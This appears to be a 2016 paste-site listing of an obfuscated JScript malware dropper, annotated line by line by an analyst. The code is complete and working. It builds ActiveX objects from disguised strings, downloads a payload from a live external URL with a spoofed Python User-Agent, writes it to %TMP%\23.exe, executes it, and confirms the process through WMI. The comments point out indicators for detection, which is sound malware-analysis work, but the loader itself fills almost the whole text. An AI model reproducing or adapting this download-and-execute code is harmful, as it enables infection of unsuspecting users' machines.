opexxx

malware_js

Nov 4th, 2016
text 3.18 KB | None | 0 0
  // Analyst note: bare string literal used as a statement; it is evaluated and discarded, so it has no runtime effect.
  // Presumably a generation timestamp left by whatever produced the script (not confirmed by the listing).
  1. "Wed Oct 5 15:12:00 PDT 2016"
  // Analyst note: thin wrapper that calls .Run(command, 1, 0) on its first argument.
  // In this listing it is called with the WScript.Shell object and the %TMP%\23.exe path, i.e. it starts the
  // downloaded file with window style 1 and without waiting for it to exit (third argument 0).
  2. function EONlDaKrDM(dUpprcYC,yrqQYUDWNqvo) {dUpprcYC.Run(yrqQYUDWNqvo, 0x1, 0x0);}
  // Analyst note: top-level download-and-execute loop of this Windows Script Host (JScript) dropper.
  // Detection pointers taken from this listing: a script host process instantiating WScript.Shell,
  // MSXML2.XMLHTTP and ADODB.Stream; an HTTP GET carrying User-Agent "Python-urllib/3.1";
  // a file named 23.exe written to and started from %TMP%; a WMI Win32_Process query for 23.exe.
  // The arithmetic constants (965-965, 100+100, ...) are obfuscation of plain literals.
  //
  // gdHnDZTwUlYlv() is a no-op in this listing (its body is entirely commented out); the block comment
  // in front of the call is filler text.
  3. /*mbRZaEZYYPUjhmpYYZvkuHWkWqeQBEFtHCKNoPeoSwZPtbgGqKLIFbykNgGfKDTLWxxUvtdYGvYOAkRIBOVzKPUExpbONVaxfLdvxqWbmPPhzMveHnYKIWjraSpRJHbChtDqrHIyNBBTsHSSFeUozwsxyPxnzNVbcuXEfrophIgZfXjbypLmkqvYOfzdjmJTRPklNvNyuh*/gdHnDZTwUlYlv();
  // Download URL list (one entry here). IoC, defanged: hxxp://masseriacarparelli[.]it/logs.php
  4. var WRXJN = ["http://masseriacarparelli.it/logs.php"];
  // 965-965 == 0: attempt counter; incremented below but never read in the visible listing.
  5. var CZUm=965-965;
  6. while(true) {
  // 932-932 == 0: leave the loop once every URL has been tried and removed from the list.
  7. if(WRXJN.length<=932-932) break;
  // Pick one of the remaining URLs at random.
  8. var cLqH = UpVmDKM() % WRXJN.length;
  9. var CWeynexRp=WRXJN[cLqH];
  // QKyBB receives a random number and is not used again in the visible listing.
  10. var QKyBB=UpVmDKM();
  // TYXetqZSGF: process name looked up through WMI below. mFaYSHk: file name of the payload on disk.
  11. var TYXetqZSGF='23.exe';
  12. var mFaYSHk='23.exe';
  // 104-103 == 1; hVhghTlZ is not referenced again in the visible listing.
  13. var hVhghTlZ=104-103;
  // bwolf(...) here decodes to the ProgID "WScript.Shell".
  14. var RJHwnVTTv = function(){
  15. return new ActiveXObject(bwolf('WS&gLxVGsmNA&cript&gLxVGsmNA&.She&l&l',[0,2,4,5,6],'&'));
  16. }();
  // Payload path: expanded %TMP% + "\" (char code 92) + "23.exe".
  17. var mFaYSHk = TqrGdj(RJHwnVTTv) + String.fromCharCode(92) + mFaYSHk;
  // bwolf(...) here decodes to the ProgID "MSXML2.XMLHTTP".
  18. var ykhQu = function(){
  19. return new ActiveXObject(bwolf('MSX&nSMiHkhqS&ML2.XM&UHjrbyFdkrV&LHTTP',[0,2,4],'&'));
  20. }();
  // Synchronous GET of the selected URL (see yHeJ).
  21. yHeJ(CWeynexRp,ykhQu);
  // 100+100 == 200: the response is written to disk only on HTTP status 200.
  22. if (ykhQu.status == 100+100) {
  // bwolf(...) here decodes to the ProgID "ADODB.Stream".
  23. var FaIVtRc = function() {
  24. return new ActiveXObject(bwolf('ADO&DB&AzyYHBFgW&.&tVjrGiBru&Stream',[0,1,3,5],'&'));
  25. }();
  // Save the raw response body to the payload path (see oVXQc); the returned size is stored but not checked.
  26. var gcBaWrkIyyPS=oVXQc(FaIVtRc,ykhQu.ResponseBody,mFaYSHk);
  27. }
  // The Run call sits outside the status check, so it is attempted even when nothing was downloaded;
  // any error raised in this try block is swallowed by the empty catch.
  28. try {
  // Start the payload through WScript.Shell.Run (see EONlDaKrDM).
  29. EONlDaKrDM(RJHwnVTTv,mFaYSHk);
  // WMI query for a running process named 23.exe; at least one match ends the loop.
  30. var RjOiqRJ = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TYXetqZSGF+'\'');
  31. if ( RjOiqRJ.Count >= 1 ){break;}
  32. } catch(e) {}
  33. CZUm++;
  // 684-683 == 1: remove the URL that was just tried so it is not selected again.
  34. WRXJN.splice (cLqH,684-683);
  35. }
  // Analyst note: calls ExpandEnvironmentStrings('%TMP%') on the object passed in; the method name is kept in an
  // array and looked up by string instead of being written as a direct member call.
  // The caller in this listing passes the WScript.Shell object, so the result is the expanded temp directory.
  36. function TqrGdj(gehkZh){var hDDdvMnk=["ExpandEnvironmentStrings"];return gehkZh[hDDdvMnk[0]]('%TMP%')}
  // Analyst note: writes a byte buffer to a file through the stream object passed in (ADODB.Stream in this listing).
  // Sequence: open -> type = 1 (binary) -> write(ZyWwH) -> position = 0 -> saveToFile(FcezZGqaIV, 2) -> read size -> close.
  // Returns the stream size; on any exception the empty catch swallows the error and the function returns undefined.
  // YgnGvsTY is assigned without var, so it becomes an implicit global.
  37. function oVXQc(RYPaBXEa,ZyWwH,FcezZGqaIV){try{RYPaBXEa.open();IOLujkIO(RYPaBXEa);VFmZfSR(RYPaBXEa,ZyWwH);uXjaSazLA(RYPaBXEa);MoKX(RYPaBXEa,FcezZGqaIV);YgnGvsTY=RYPaBXEa.size;bcuroUR(RYPaBXEa);return YgnGvsTY;}catch(e){}}
  // Analyst note: issues the HTTP request on the XMLHTTP object passed in.
  // The split string yields pieces 0, 2 and 3 = "G" + "E" + "T", so the call is open("GET", url, false), a synchronous request.
  // The User-Agent header is set to the fixed value "Python-urllib/3.1", which is usable as a network indicator.
  // Errors are swallowed by the empty catch; moXy is assigned without var (implicit global).
  38. function yHeJ(yxYYoN,iCmbMGj){try{moXy = 'G*STLWRiJVJj*E*T*anqDxqmtlWum'.split('*');iCmbMGj.open(moXy[0]+moXy[2]+moXy[3], yxYYoN, false);iCmbMGj.setRequestHeader("User-Agent", "Python-urllib/3.1");iCmbMGj.send();}catch(e){}}
  // Analyst note: string de-obfuscation helper. Splits JSWiaEyv on the separator SVwTveCUi, concatenates the pieces
  // whose indices are listed in nwvEPT (skipping the junk pieces in between), and returns the result.
  // The accumulator starts with the 3-character filler 'ucW', which substring(3, ...) removes again.
  // In this listing it yields "WScript.Shell", "MSXML2.XMLHTTP" and "ADODB.Stream".
  // xCsZm, VjwYYUc and rXWJtZvf are assigned without var (implicit globals).
  39. function bwolf(JSWiaEyv,nwvEPT,SVwTveCUi){xCsZm=JSWiaEyv.split(SVwTveCUi);VjwYYUc = 'ucW';for(rXWJtZvf=0;rXWJtZvf<nwvEPT.length;rXWJtZvf++) {VjwYYUc+=xCsZm[nwvEPT[rXWJtZvf]];}return VjwYYUc.substring(3,VjwYYUc.length);}
  // Analyst note: no-op. The only statement, a Sleep(2272-156) call (2116 ms) on the object returned by
  // rIeIICpxkd(), is commented out, so the function does nothing when called at the top of the script.
  40. function gdHnDZTwUlYlv() {/*rIeIICpxkd().Sleep(2272-156);*/}
  // Analyst note: returns Math.random(); the method name is looked up by string from an array rather than called directly.
  41. function VKZpHFh(){var JJsZBn=["random"];return Math[JJsZBn[0]]()}
  // Analyst note: calls open() on its argument. Not called anywhere in the visible listing
  // (oVXQc calls open() on the stream directly).
  42. function wqrr(qAGWwr) {qAGWwr.open();}
  // Analyst note: sets type = 1 on the stream passed in; for ADODB.Stream that value selects binary mode (adTypeBinary).
  43. function IOLujkIO(vclddJTss) {vclddJTss.type=1;}
  // Analyst note: writes LnpYN into the stream kfEK; in this listing LnpYN is the HTTP ResponseBody.
  44. function VFmZfSR(kfEK,LnpYN) {kfEK.write(LnpYN);}
  // Analyst note: returns the WScript host object; the block comment between return and WScript is filler text.
  // Its only reference in the visible listing is inside the commented-out body of gdHnDZTwUlYlv.
  45. function rIeIICpxkd() {return/*oyWQMeqTVgqSzWvRLsDvpMnJxWwnVnEkTEIfdmieLebMCwLhMimUdEbeKDequxRJreoOoOUJvvFayqVQIrPNKQKTREFONbYDJWOQsJzHY*/WScript;}
  // Analyst note: sets the stream position to 0. TlOlnxhMXn is an empty array, so length * (912382-201) is always 0;
  // the multiplication only disguises the literal.
  46. function uXjaSazLA(wxFJKi) {var TlOlnxhMXn=[];wxFJKi.position=TlOlnxhMXn.length*(912382-201);}
  // Analyst note: saves the stream to the path UmEVrAk with option 2, which for ADODB.Stream means
  // create the file or overwrite an existing one (adSaveCreateOverWrite).
  47. function MoKX(dXLtdsL,UmEVrAk) {dXLtdsL.saveToFile(UmEVrAk, 2);}
  // Analyst note: closes the stream passed in.
  48. function bcuroUR(Eujpa) {Eujpa.close();}
  // Analyst note: returns a random integer between 100 and 100000 (Math.round of random * 99900 + 100).
  // The main loop uses it modulo the URL list length to choose which URL to try.
  49. function UpVmDKM() {var dkHn=100000;var yHdejl = 100;return Math.round(VKZpHFh()*(dkHn-yHdejl)+yHdejl);}
  // Analyst note: appends CIMOI random ASCII letters to LoLhI and returns it.
  // LoLhI is never declared or initialised in the visible listing, and the function is not called there,
  // so it looks like unused generator leftover; if called as shown, the first += would fail on the undefined name.
  50. function youPQwRK(CIMOI) {var DPuGlnst='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var lRcwI=0;lRcwI<CIMOI;lRcwI++){LoLhI+=DPuGlnst.charAt(Math.floor(Math.random()*DPuGlnst.length));}return LoLhI;}
  // Analyst note: generic wrapper around new ActiveXObject(progId). Not called in the visible listing;
  // the main loop constructs its ActiveX objects inline instead.
  51. function EyLFuCjUuDOErR(YOumLeqeAEqmoS) {return new ActiveXObject(YOumLeqeAEqmoS);}